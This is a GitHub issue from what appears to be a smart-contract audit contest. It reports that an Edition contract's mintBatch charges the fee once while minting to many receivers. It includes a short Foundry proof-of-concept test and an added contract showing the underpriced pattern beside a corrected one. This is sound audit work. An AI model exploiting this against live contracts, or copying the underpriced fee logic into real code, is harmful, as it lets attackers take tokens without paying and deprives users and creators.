ArsenLupin - The attacker could mint all the tokenId's, but paying the fee only for the 1 tokenId #330

Closed
sherlock-admin3 opened this issue Apr 26, 2024 · 5 comments
Labels
Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label Escalation Resolved This issue's escalations have been approved/rejected High A valid High severity issue Reward A payout will be made for this issue Sponsor Confirmed The sponsor acknowledged this issue is valid Won't Fix The sponsor confirmed this issue will not be fixed

Comments

@sherlock-admin3
Contributor

sherlock-admin3 commented Apr 26, 2024

ArsenLupin

high

The attacker could mint all the tokenId's, but paying the fee only for the 1 tokenId

Summary

In the mintBatch function we can mint a token to a set of receivers for the given work. However, the function works incorrectly, because the fee is paid only for 1 tokenId, but the issue function mints the tokenId in the loop to the different addresses.

Vulnerability Detail

  1. Attacker creates many accounts as receivers_
  2. Attacker invokes the mintBatch and pays the fee for minting 1 tokenId.
    2.1 - The 1 tokenId is minted for each receiver in the loop till the maxSupply is reached
  3. Attacker receives all the tokenId's while paying only for one tokenId

```solidity
function test_mintBatchToManyUsers() public {
    // Five receiver addresses passed to mintBatch.
    address[] memory users = new address[](5);
    users[0] = address(1);
    users[1] = address(2);
    users[2] = address(3);
    users[3] = address(4);
    users[4] = address(5);

    // Fund the calling account.
    address attacker = address(8888);
    vm.deal(address(attacker), 1 ether);

    // One mintBatch call with a single payment; compare the balance before and after.
    console.log("The attacker balance before", address(attacker).balance);
    vm.prank(address(attacker));
    edition.mintBatch{value: 0.01275 ether}(users, 1, 1, "0x");
    console.log("The attacker balance after", address(attacker).balance);
}
```

Impact

Attacker could mint all the tokenId's to himself (accounts that belong to the attacker) and prevent other users from minting this tokenId

Code Snippet

https://github.com/sherlock-audit/2024-04-titles/blob/main/wallflower-contract-v2/src/editions/Edition.sol#L304-L320

Tool used

Manual Review / Foundry

Recommendation

Ensure that the correct amount of fees is paid, based on the overall amount of minted tokenId's.

Duplicate of #264
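
The recommendation above, shown as an added example that is not part of the original report or the audited code base: a minimal contract with the under-charging batch mint beside a version whose fee scales with the total number of tokens issued. The contract name, function names, the flat `FEE_PER_TOKEN` and the simplified supply accounting are all assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/// Added illustration: a simplified stand-in for batch-mint fee logic.
/// All names and values here are hypothetical, not the audited contract.
contract BatchMintFeeSketch {
    uint256 public constant FEE_PER_TOKEN = 0.01 ether; // constructed value
    uint256 public immutable maxSupply;
    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;

    error InsufficientFee(uint256 required, uint256 sent);
    error MaxSupplyExceeded();

    constructor(uint256 maxSupply_) {
        maxSupply = maxSupply_;
    }

    /// Pattern described in the report: the fee covers `amount` once,
    /// but `amount` is issued to every receiver in the loop.
    function mintBatchUnderpriced(address[] calldata receivers, uint256 amount) external payable {
        uint256 required = FEE_PER_TOKEN * amount;
        if (msg.value < required) revert InsufficientFee(required, msg.value);
        for (uint256 i = 0; i < receivers.length; i++) {
            _issue(receivers[i], amount);
        }
    }

    /// Corrected form: the fee is computed over every token actually issued.
    function mintBatchPriced(address[] calldata receivers, uint256 amount) external payable {
        uint256 required = FEE_PER_TOKEN * amount * receivers.length;
        if (msg.value < required) revert InsufficientFee(required, msg.value);
        for (uint256 i = 0; i < receivers.length; i++) {
            _issue(receivers[i], amount);
        }
    }

    /// Shared issuance step with the supply cap enforced per receiver.
    function _issue(address to, uint256 amount) internal {
        if (totalSupply + amount > maxSupply) revert MaxSupplyExceeded();
        totalSupply += amount;
        balanceOf[to] += amount;
    }
}
```

With five receivers and `amount = 1`, `mintBatchUnderpriced` accepts `FEE_PER_TOKEN` while `mintBatchPriced` reverts unless `5 * FEE_PER_TOKEN` is sent; refunding any excess is left out of this sketch.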

@github-actions github-actions bot closed this as completed May 6, 2024
@github-actions github-actions bot added the Excluded Excluded by the judge without consulting the protocol or the senior label May 6, 2024
@sherlock-admin2 sherlock-admin2 changed the title Prehistoric Mercurial Monkey - The attacker could mint all the tokenId's, but paying the fee only for the 1 tokenId ArsenLupin - The attacker could mint all the tokenId's, but paying the fee only for the 1 tokenId May 12, 2024
@sherlock-admin2 sherlock-admin2 added the Non-Reward This issue will not receive a payout label May 12, 2024
@ShaheenRehman

Escalate

This finding is a valid dup of #264

@sherlock-admin3
Contributor Author

> Escalate
>
> This finding is a valid dup of #264

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

@sherlock-admin4 sherlock-admin4 added the Escalated This issue contains a pending escalation label May 13, 2024
@WangSecurity
Collaborator

Agree with the escalation, planning to accept and duplicate with #264

@Evert0x Evert0x added the High A valid High severity issue label May 17, 2024
@sherlock-admin2 sherlock-admin2 added Reward A payout will be made for this issue and removed Non-Reward This issue will not receive a payout labels May 17, 2024
@Evert0x

Evert0x commented May 17, 2024

Result:
High
Duplicate of #264

@sherlock-admin2 sherlock-admin2 removed the Escalated This issue contains a pending escalation label May 17, 2024
@sherlock-admin3 sherlock-admin3 added the Escalation Resolved This issue's escalations have been approved/rejected label May 17, 2024
@sherlock-admin4
Contributor

Escalations have been resolved successfully!

Escalation status:

@sherlock-admin3 sherlock-admin3 added Sponsor Confirmed The sponsor acknowledged this issue is valid Won't Fix The sponsor confirmed this issue will not be fixed labels May 20, 2024
@sherlock-admin2 sherlock-admin2 added Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label and removed Excluded Excluded by the judge without consulting the protocol or the senior labels May 27, 2024